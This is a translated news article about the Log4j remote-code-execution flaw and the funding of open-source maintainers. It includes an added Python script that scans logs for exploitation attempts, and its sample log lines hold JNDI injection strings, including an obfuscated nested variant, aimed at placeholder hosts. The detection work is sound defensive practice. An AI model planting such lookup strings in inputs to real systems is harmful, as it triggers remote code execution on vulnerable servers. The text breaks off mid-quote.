
The bigger problem behind the Log4j vulnerability – the source of funding for open source projects


Servers at companies like Apple, Twitter, Steam, Tesla, and Oracle are all at risk

Source | TheNextWeb

Author | Ivan Mehta

Translation | Tech walkers

This article has been updated to include details about the latest Log4j releases, new exploit vectors, and the risks associated with all Java versions.

While most racing enthusiasts were watching the F1 championship battle between Verstappen and Hamilton, most Internet companies were being frightened by a sudden incident.

The average user may not notice anything amiss: Twitter, Facebook, Gmail, and the other services we use every day are still up and running. But just recently, a bug in the open source Log4j library caused panic across the global information security community.

The bug has affected billions of devices, and companies are scrambling to install fixes, while the open source community is confronting a deeper problem: where to find the money to support the volunteers who maintain open source projects like Log4j.

Before diving into these complex topics, let's take a brief look at the background of the Log4j technology and its security issue.

What is Log4j?

Log4j 2 is an open source, Java-based logging framework maintained by the Apache Software Foundation that anyone can use for free. Many enterprises use this logging software to track activity on their servers, and even in client applications.

For example, when we visit a website, the logger records our IP address, our browser, and the pages we visit. With this activity data, businesses can diagnose and fix problems that arise in their services.

Because the Log4j library is written in Java, the billions of devices that run software built on the framework could be put at risk by its security vulnerabilities.

What exactly is the bug in Log4j?

The vulnerability, which was listed last week as CVE-2021-44228, could allow an attacker to remotely execute code via specially crafted strings. Because Log4j is so widely used, cybercriminals can easily get such strings into log messages and thus take control of the target server or client.

The root cause of this bug is that some versions of Log4j allow arbitrary text in a log message to be interpreted as a lookup and executed via the Lightweight Directory Access Protocol (LDAP).
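Because the logged values the article lists (IP address, browser string, requested page) are attacker-controlled, a defender's first triage step is to scan existing logs for the lookup syntax. The following detection routine is an added example, not code from the article; the log lines, IP addresses, and hostnames are constructed here, and the nested-lookup normalization is a simplification of what production detection rules handle.

```python
import re

# Constructed sample web-access log lines (not from the article). The last
# quoted field is the client's User-Agent, a value a web server logs verbatim.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2021:10:01:05 +0000] "GET /login HTTP/1.1" 200 88 "${jndi:ldap://example.invalid/a}"
203.0.113.9 - - [10/Dec/2021:10:01:06 +0000] "GET /login HTTP/1.1" 200 88 "${${lower:j}ndi:rmi://example.invalid/b}"
198.51.100.4 - - [10/Dec/2021:10:02:00 +0000] "GET /about HTTP/1.1" 200 300 "curl/7.79.1"
"""

# Innermost ${lower:x} / ${upper:x} wrapper; these are the simplest way the
# literal token gets split up so that a naive substring match misses it.
_NESTED = re.compile(r"\$\{(?:lower|upper):([^}$]+)\}", re.IGNORECASE)
# The lookup prefix itself, matched case-insensitively after normalization.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(text: str) -> str:
    """Repeatedly collapse simple nested lower/upper wrappers to their
    argument so the underlying lookup prefix becomes visible."""
    prev = None
    while prev != text:
        prev = text
        text = _NESTED.sub(lambda m: m.group(1), text)
    return text


def find_jndi_lookups(log_text: str) -> list[tuple[int, str]]:
    """Return (line_number, client_ip) for every log line that contains a
    JNDI lookup string, directly or behind simple nesting."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        if _JNDI.search(normalize(line)):
            hits.append((lineno, line.split(" ", 1)[0]))
    return hits


if __name__ == "__main__":
    for lineno, ip in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {lineno}: JNDI lookup string received from {ip}")
```

A match tells you which clients sent lookup strings, not whether the lookup succeeded; confirming exposure still requires checking the Log4j version on the receiving host and applying the fix.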

Please note that this #log4j issue is plunging the entire Internet into crisis. And the key to all this is a simple string "$
Valsorda (@FiloSottile), December 10, 2021
